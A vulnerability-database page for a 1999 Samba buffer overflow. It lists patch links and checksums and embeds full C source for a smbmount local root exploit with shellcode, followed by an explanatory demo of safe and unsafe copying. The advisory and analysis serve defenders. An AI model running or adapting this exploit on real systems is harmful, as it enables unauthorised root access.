CVE-1999-0811
CVSS5.0
Published: 1999-07-21 00:00:00
Revised: 2008-09-09 08:35:40
NMCOE    

[Original] Buffer overflow in Samba smbd program via a malformed message command.


[CNNVD] Samba pre-2.0.5 vulnerability (CNNVD-199907-027)

        A buffer overflow vulnerability exists in the Samba smbd program; it can be triggered by a malformed message command.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0811
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0811
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-027
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/536
(UNKNOWN)  BID  536

- Vulnerability information

Samba pre-2.0.5 vulnerability
Medium severity  Buffer overflow
1999-07-21 00:00:00 2005-05-02 00:00:00
Remote / Local
        A buffer overflow vulnerability exists in the Samba smbd program; it can be triggered by a malformed message command.

- Advisories and patches

        As pointed out in the message to BugTraq, these problems and more were fixed in Samba version 2.0.5. See
        http://www.samba.org/ for the release notes and download.
        The Samba 2.0.5 release has the following MD5 checksum
         9fa63ff151ae697648020df37464eca9 b samba-2.0.5.tar.gz
        The following fixes for the Samba package released with Debian 2.1 are available:
        Source archives:
        http://security.debian.org/dists/stable/updates/source/samba_2.0.5a-1.diff.gz
         MD5 checksum: 1354ea63f79e7fa0b4b71685dbac118b
        http://security.debian.org/dists/stable/updates/source/samba_2.0.5a-1.dsc
         MD5 checksum: e51aeb259913179b60dbddd0b9e70bf5
        http://security.debian.org/dists/stable/updates/source/samba_2.0.5a.orig.tar.gz
         MD5 checksum: 497e5f98ed9b520b18e926ff2f7307ba
        Architecture independent archives:
        http://security.debian.org/dists/stable/updates/binary-all/samba-doc_2.0.5a-1_all.deb
         MD5 checksum: a9c1addcff72605f66a2334eef5e25ef
        Alpha architecture:
        http://security.debian.org/dists/stable/updates/binary-alpha/samba-common_2.0.5a-1_alpha.deb
         MD5 checksum: 48b9651e2cefd6f6ad820ded9ebc9191
        http://security.debian.org/dists/stable/updates/binary-alpha/samba_2.0.5a-1_alpha.deb
         MD5 checksum: 9bb86e810254fe59feb02e817815b64f
        http://security.debian.org/dists/stable/updates/binary-alpha/smbclient_2.0.5a-1_alpha.deb
         MD5 checksum: 54a89ad98e1167a3265ff30881618b3f
        http://security.debian.org/dists/stable/updates/binary-alpha/smbfs_2.0.5a-1_alpha.deb
         MD5 checksum: 596e22cdf0848fcffd1885f16b38cf83
        http://security.debian.org/dists/stable/updates/binary-alpha/smbwrapper_2.0.5a-1_alpha.deb
         MD5 checksum: 5003fb2a3555daddd3d877529ac65e1e
        http://security.debian.org/dists/stable/updates/binary-alpha/swat_2.0.5a-1_alpha.deb
         MD5 checksum: e99ec78abdac4a8ab1348773e3fa32cd
        Intel ia32 architecture:
        http://security.debian.org/dists/stable/updates/binary-i386/samba-common_2.0.5a-1_i386.deb
         MD5 checksum: eb8b9aa964912975db301f1e83919d36
        http://security.debian.org/dists/stable/updates/binary-i386/samba_2.0.5a-1_i386.deb
         MD5 checksum: 799ab1a56dd726548c33a130edfb9231
        http://security.debian.org/dists/stable/updates/binary-i386/smbclient_2.0.5a-1_i386.deb
         MD5 checksum: f5db7b12b67b24048d7ff915c9ec77ee
        http://security.debian.org/dists/stable/updates/binary-i386/smbfs_2.0.5a-1_i386.deb
         MD5 checksum: b6e90edf5db22cf3952a01f726cb7dd7
        http://security.debian.org/dists/stable/updates/binary-i386/smbwrapper_2.0.5a-1_i386.deb
         MD5 checksum: afabbae0e5ffdd03475a302586d75be5
        http://security.debian.org/dists/stable/updates/binary-i386/swat_2.0.5a-1_i386.deb
         MD5 checksum: bd235e608944c7cd3cc7a17fceab0199
        Motorola 680x0 architecture:
        http://security.debian.org/dists/stable/updates/binary-m68k/samba-common_2.0.5a-1_m68k.deb
         MD5 checksum: 91d8b04d9ef76ca08fff5938007eb235
        http://security.debian.org/dists/stable/updates/binary-m68k/samba_2.0.5a-1_m68k.deb
         MD5 checksum: 6404ca678a20ad17e44b6c74cc3182a1
        http://security.debian.org/dists/stable/updates/binary-m68k/smbclient_2.0.5a-1_m68k.deb
         MD5 checksum: 37f0a04da50f9880b22cb3eaf27b2794
        http://security.debian.org/dists/stable/updates/binary-m68k/smbfs_2.0.5a-1_m68k.deb
         MD5 checksum: 3685040bee6e01039f6588f97dab2c26
        http://security.debian.org/dists/stable/updates/binary-m68k/smbwrapper_2.0.5a-1_m68k.deb
         MD5 checksum: 1a43221c50137cbf5d94f7ad90ab548e
        http://security.debian.org/dists/stable/updates/binary-m68k/swat_2.0.5a-1_m68k.deb
         MD5 checksum: 7b5e610c9b044fe81ac66881ea59af64
        Sun Sparc architecture:
        http://security.debian.org/dists/stable/updates/binary-sparc/samba-common_2.0.5a-1_sparc.deb
         MD5 checksum: f4713291f719de2f32543e0fc37506ea
        http://security.debian.org/dists/stable/updates/binary-sparc/samba_2.0.5a-1_sparc.deb
         MD5 checksum: afb22260c07c60e4afd390bb3e108674
        http://security.debian.org/dists/stable/updates/binary-sparc/smbclient_2.0.5a-1_sparc.deb
         MD5 checksum: 28b22378ddb79b05d29b4b4fac2038c4
        http://security.debian.org/dists/stable/updates/binary-sparc/smbfs_2.0.5a-1_sparc.deb
         MD5 checksum: 8747b52257b451a1e19c93ea10048369
        http://security.debian.org/dists/stable/updates/binary-sparc/smbwrapper_2.0.5a-1_sparc.deb
         MD5 checksum: 420bfe236fcc1591175acd7eb3ad83e0
        http://security.debian.org/dists/stable/updates/binary-sparc/swat_2.0.5a-1_sparc.deb
         MD5 checksum: 38380d76284421c18e557e2d3a413a62
        These files will be moved into
         ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon.
        For not yet released architectures please refer to the appropriate
        directory ftp://ftp.debian.org/debian/dists/sid/binary-$arch/ .
        RedHat Fixes:
        Red Hat Linux 6.0:
        Intel: ftp://updates.redhat.com/6.0/i386/
         samba-2.0.5a-1.i386.rpm
         samba-client-2.0.5a-1.i386.rpm
        Alpha: ftp://updates.redhat.com/6.0/alpha/
         samba-2.0.5a-1.alpha.rpm
         samba-client-2.0.5a-1.alpha.rpm
        Sparc: ftp://updates.redhat.com/6.0/sparc/
         samba-2.0.5a-1.sparc.rpm
         samba-client-2.0.5a-1.sparc.rpm
        Source: ftp://updates.redhat.com/6.0/
         samba-2.0.5a-1.src.rpm
        Red Hat Linux 5.2:
        Intel: ftp://updates.redhat.com/5.2/i386/
         samba-2.0.5a-0.5.2.i386.rpm
         samba-client-2.0.5a-0.5.2.i386.rpm
        Alpha: ftp://updates.redhat.com/5.2/alpha/
         samba-2.0.5a-0.5.2.alpha.rpm
         samba-client-2.0.5a-0.5.2.alpha.rpm
        Sparc: ftp://updates.redhat.com/5.2/sparc/
         samba-2.0.5a-0.5.2.sparc.rpm
         samba-client-2.0.5a-0.5.2.sparc.rpm
        Source: ftp://updates.redhat.com/5.2/
         samba-2.0.5a-0.5.2.src.rpm
        Red Hat Linux 4.2:
        Intel: ftp://updates.redhat.com/4.2/i386/
         samba-2.0.5a-0.4.2.i386.rpm
         samba-client-2.0.5a-0.4.2.i386.rpm
        Alpha: ftp://updates.redhat.com/4.2/alpha/
         samba-2.0.5a-0.4.2.alpha.rpm
         samba-client-2.0.5a-0.4.2.alpha.rpm
        Sparc: ftp://updates.redhat.com/4.2/sparc/
         samba-2.0.5a-0.4.2.sparc.rpm
         samba-client-2.0.5a-0.4.2.sparc.rpm
        Source: ftp://updates.redhat.com/4.2/
         samba-2.0.5a-0.4.2.src.rpm

- Vulnerability information (19428)

Samba Pre-2.0.5 Vulnerabilities (EDBID:19428)
linux local
1999-07-21 Verified
Gerald Britton
N/A
source: http://www.securityfocus.com/bid/536/info

There were a number of vulnerabilities in the Samba package prior to 2.0.5. The first is a possible denial of service in nmbd (the NetBIOS name service daemon), which resulted in nmbd spinning until killed. The second known vulnerability is a possible buffer overflow in smbd which is not exploitable in the default install/configuration: a function in the messaging system could be exploited and arbitrary code executed as root if the "message command" was set in smb.conf. There was also a race condition which could possibly allow an attacker to mount arbitrary points in the filesystem if smbmnt was setuid root (which it is not by default).

/*
The default parameters to the program
often work, however I have found that the offset parameter sometimes
varies wildly, values between -600 and -100 usually work though, a quick
shell script will scan through these.
*/

/*
** smbexpl -- a smbmount root exploit under Linux
**
** Author: Gerald Britton <gbritton@nih.gov>
**
** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.
** The code does not do range checking when copying a username from
** the environment variables USER or LOGNAME.  To get this far into
** the code we need to execute with dummy arguments of a server and a
** mountpoint to use (./a in this case).  The user will need to create
** the ./a directory and then execute smbexpl to gain root.  This code
** is also setup to use /tmp/sh as the shell as bash-2.01 appears to
** do a seteuid(getuid()) so /bin/sh on my system won't work.  Finally
** a "-Q" (an invalid commandline argument) causes smbmount to fail when
** parsing args and terminate, thus jumping into our shellcode.
**
** The shellcode used in this program also needed to be specialized as
** smbmount toupper()'s the contents of the USER variable.  Self modifying
** code was needed to ensure that the shellcode will survive toupper().
**
** The quick fix for the security problem:
**          chmod -s /sbin/smbmount
**
** A better fix would be to patch smbmount to do bounds checking when
** copying the contents of the USER and LOGNAME variables.
**
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* strlen */
#include <unistd.h>   /* execl */

#define DEFAULT_OFFSET                 -202
#define DEFAULT_BUFFER_SIZE             211
#define DEFAULT_ALIGNMENT                 2
#define NOP                            0x90

/* This shell code is designed to survive being filtered by toupper():
 * the first stage contains no bytes in 'a'..'z', and it ORs 0x20 back
 * into the second stage (and the "/tmp/sh" string) where toupper()
 * would have cleared that bit, before jumping to the second stage. */

char shellcode[] =
        "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
        "\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
        "\xeb\x05\xe8\xdb\xff\xff\xff"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

/* Current stack pointer; i386 only, like the rest of this exploit. */
unsigned long get_sp(void) {
   unsigned long sp;
   __asm__("movl %%esp,%0" : "=r"(sp));
   return sp;
}

int main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;          /* long is 4 bytes on i386 */
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int alignment=DEFAULT_ALIGNMENT;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (argc > 3) alignment = atoi(argv[3]);
  printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(1);
  }

  /* Guessed return address: a little below our own stack pointer, where
   * smbmount's stack frame will sit once it has been exec'd. */
  addr = get_sp() - offset;
  fprintf(stderr,"Using address: 0x%lx\n", addr);

  /* Fill the buffer with copies of the guessed address, starting at
   * 'alignment' so the words line up with the saved return address.
   * The loop stops while a whole word still fits inside the buffer. */
  ptr = buff;
  addr_ptr = (long *) (ptr+alignment);
  for (i = 0; i + (int)sizeof(long) <= bsize-alignment; i += sizeof(long))
    *(addr_ptr++) = addr;

  /* NOP sled over the first half of the buffer... */
  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  /* ...and the shellcode placed so that it ends at byte 128. */
  ptr = buff + (128 - strlen(shellcode));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  /* smbmount copies USER into a fixed buffer with no bounds check; the
   * invalid "-Q" makes it fail argument parsing and return into our data. */
  setenv("USER",buff,1);
  execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",(char *)NULL);
  perror("execl");               /* only reached if the exec failed */
  return 1;
}
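The exploit header above names two things a practitioner will want to see in isolation: the unbounded, toupper()'d copy of USER into a fixed buffer that smbmount gets wrong (and the bounds-checked copy the author recommends as the real fix), and the filter constraint that forced a self-modifying payload. The following C program is an added example, not code from the original page, from the exploit author, or from Samba/smbfs. It models the copy with a made-up 32-byte destination (NAME_LEN, copy_user_unsafe and copy_user_safe are assumptions for the demo, not smbmount's real buffer size or symbols), and adds bytes_altered_by_toupper(), which reports how many bytes of a payload toupper() would change; it is run on the two shellcode stages copied from the listing above.

```c
/*
 * Added example, not code from the original page or from Samba/smbfs.
 * NAME_LEN and every function name here are assumptions for the demo.
 */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME_LEN 32     /* assumed fixed destination size, not smbmount's */

/* Vulnerable pattern: no length check, so a USER longer than NAME_LEN-1
 * keeps writing past the end of dst.  Returns bytes written including the
 * NUL; the demo passes an oversized dst so the overrun is measurable
 * instead of a crash. */
size_t copy_user_unsafe(char *dst, const char *src)
{
    size_t i = 0;
    for (; src[i] != '\0'; i++)
        dst[i] = (char)toupper((unsigned char)src[i]);
    dst[i] = '\0';
    return i + 1;
}

/* Hardened form: measure first, refuse anything that does not fit together
 * with its terminator, and only then write.  Returns bytes written, or 0
 * when rejected (dst is left untouched). */
size_t copy_user_safe(char dst[NAME_LEN], const char *src)
{
    size_t n = 0;
    while (n < NAME_LEN && src[n] != '\0')
        n++;
    if (n == NAME_LEN)          /* no room left for the NUL: reject */
        return 0;
    for (size_t i = 0; i < n; i++)
        dst[i] = (char)toupper((unsigned char)src[i]);
    dst[n] = '\0';
    return n + 1;
}

/* Filter-survivability check: count payload bytes in 'a'..'z', the only
 * bytes toupper() changes in the C locale.  *first_bad receives the offset
 * of the first such byte (len if there is none).  This is the constraint
 * the exploit's self-modifying first stage exists to work around. */
size_t bytes_altered_by_toupper(const unsigned char *p, size_t len,
                                size_t *first_bad)
{
    size_t count = 0;
    if (first_bad)
        *first_bad = len;
    for (size_t i = 0; i < len; i++) {
        if (p[i] >= 'a' && p[i] <= 'z') {
            if (count == 0 && first_bad)
                *first_bad = i;
            count++;
        }
    }
    return count;
}

/* The two stages of the exploit's shellcode, copied from the listing above
 * (39 and 45 bytes) so the check can be run on real input. */
const unsigned char STAGE1[] =
        "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
        "\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
        "\xeb\x05\xe8\xdb\xff\xff\xff";
const unsigned char STAGE2[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

int main(void)
{
    char scratch[512];             /* oversized on purpose, see above */
    char user[NAME_LEN];
    char longname[100];            /* constructed 99-byte USER value */
    size_t first, n;

    memset(longname, 'a', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';

    printf("unsafe copy of a 99-byte USER wrote %zu bytes into a %d-byte field\n",
           copy_user_unsafe(scratch, longname), NAME_LEN);
    printf("safe copy of the same USER wrote %zu bytes (0 = rejected)\n",
           copy_user_safe(user, longname));
    n = copy_user_safe(user, "gbritton");
    printf("safe copy of \"gbritton\" -> \"%s\" (%zu bytes)\n", user, n);

    n = bytes_altered_by_toupper(STAGE1, sizeof STAGE1 - 1, &first);
    printf("stage 1: %zu byte(s) altered by toupper()\n", n);
    n = bytes_altered_by_toupper(STAGE2, sizeof STAGE2 - 1, &first);
    printf("stage 2: %zu byte(s) altered, first at offset %zu\n", n, first);
    return 0;
}
```

Run as-is it shows the 99-byte USER overrunning the 32-byte field by 68 bytes while the checked copy rejects it, and that the decoder stage has no byte toupper() touches whereas the second stage has six (the 0x76 of the mov at offset 4 and the lowercase letters of "/tmp/sh"), which is exactly the set the first stage has to repair before it jumps.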

- Vulnerability information

1025
Samba smbd Malformed Message Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Unknown Vendor Verified

- Vulnerability description

- Timeline

1999-07-21 Unknown
Unknown Unknown

- Solution

Upgrade to version 2.0.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete